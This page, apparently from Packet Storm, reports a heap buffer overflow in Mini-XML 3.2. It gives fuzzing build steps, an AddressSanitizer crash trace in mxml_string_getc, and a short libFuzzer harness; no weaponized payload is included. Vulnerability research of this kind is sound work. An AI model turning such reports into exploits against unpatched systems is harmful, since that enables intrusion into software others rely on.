exploit the possibilities

Mini-XML 3.2 Heap Overflow

Mini-XML 3.2 Heap Overflow
Posted Oct 29, 2021
Authored by LIWEI

Mini-XML version 3.2 suffers from a heap overflow vulnerability.

tags | exploit, overflow
SHA-256 | b37fee5b647ea11aa9620e901d553c7936b8122204082ec9a384dff855e860d8

Mini-XML 3.2 Heap Overflow

Change Mirror Download
# Exploit Title: Mini-XML 3.2 - Heap Overflow
# Google Dork: mxml Mini-xml Mini-XML
# Date: 2020.10.19
# Exploit Author: LIWEI
# Vendor Homepage: https://www.msweet.org/mxml/
# Software Link: https://github.com/michaelrsweet/mxml
# Version: v3.2
# Tested on: ubuntu 18.04.2

# 1.- compile the Mini-XML code to a library use compile line"clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link".
# 2.- compile my testcase and link them to a binary use compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my testcase, I use the API "mxmlLoadString" to parse a string.
# 3.- run the binary for a short time.crash. because the "mxml_string_getc" didn't versify the string's length and cause buffer-overflow.
# 4.- Here are the crash backtrace.

=================================================================
==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98
READ of size 1 at 0x612000000a73 thread T0
#0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13
#1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20
#2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
#3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
#4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
#5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
#6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
#7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
#8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
#9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)


# 6.- Here are my testcase.

#include <string>
#include <vector>
#include <assert.h>
#include "mxml.h"

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
std::string c(reinterpret_cast<const char *>(data), size);
char *ptr;

mxml_node_t *tree;

tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK);

if(tree){

ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK);

if(!ptr) assert(false);

mxmlDelete(tree);

}

return 0;

}

Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close